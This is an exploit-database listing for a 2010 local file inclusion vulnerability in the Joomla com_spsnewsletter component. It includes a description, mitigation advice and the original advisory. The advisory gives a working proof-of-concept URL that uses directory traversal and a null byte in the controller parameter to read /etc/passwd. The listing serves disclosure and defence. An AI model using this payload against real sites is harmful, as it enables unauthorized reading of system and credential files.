header-logo
Suggest Exploit
vendor:
spsNewsletter
by:
AntiSecurity
8,8
CVSS
HIGH
Local File Inclusion
98
CWE
Product Name: spsNewsletter
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: No
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2010

Joomla Component spsNewsletter Local File Inclusion Vulnerability

A local file inclusion vulnerability exists in the com_spsnewsletter component of Joomla. An attacker can exploit this vulnerability by sending a specially crafted HTTP request to the vulnerable server. This request contains a maliciously crafted parameter which can be used to include arbitrary files from the server. This can be used to gain access to sensitive information such as passwords and other confidential data.

Mitigation:

The best way to mitigate this vulnerability is to ensure that all user input is properly sanitized and validated before being used in any file operations.
Source

Exploit-DB raw data:

===================================================================================================================


  [o] Joomla Component spsNewsletter Local File Inclusion Vulnerability
 
       Software : com_spsnewsletter
       Vendor   : http://www.modernbridge.com/spsNewsletter/
       Author   : AntiSecurity [ Vrs-hCk NoGe OoN_BoY Paman zxvf s4va ]
       Contact  : public[at]antisecurity[dot]org
       Home     : http://antisecurity.org/


===================================================================================================================


  [o] Exploit

       http://localhost/[path]/index.php?option=com_spsnewsletter&controller=[LFI]


  [o] PoC

       http://localhost/index.php?option=com_spsnewsletter&controller=../../../../../../../../../../etc/passwd%00


===================================================================================================================


  [o] Greetz

       Angela Zhang stardustmemory aJe martfella pizzyroot Genex
       H312Y yooogy mousekill }^-^{ noname matthews s4va wishnusakti
       skulmatic OLiBekaS ulga Cungkee k1tk4t str0ke


===================================================================================================================


  [o] April 11 2010 - GMT +07:00 Jakarta, Indonesia

Navigation

Suggest Exploit

Services By CQR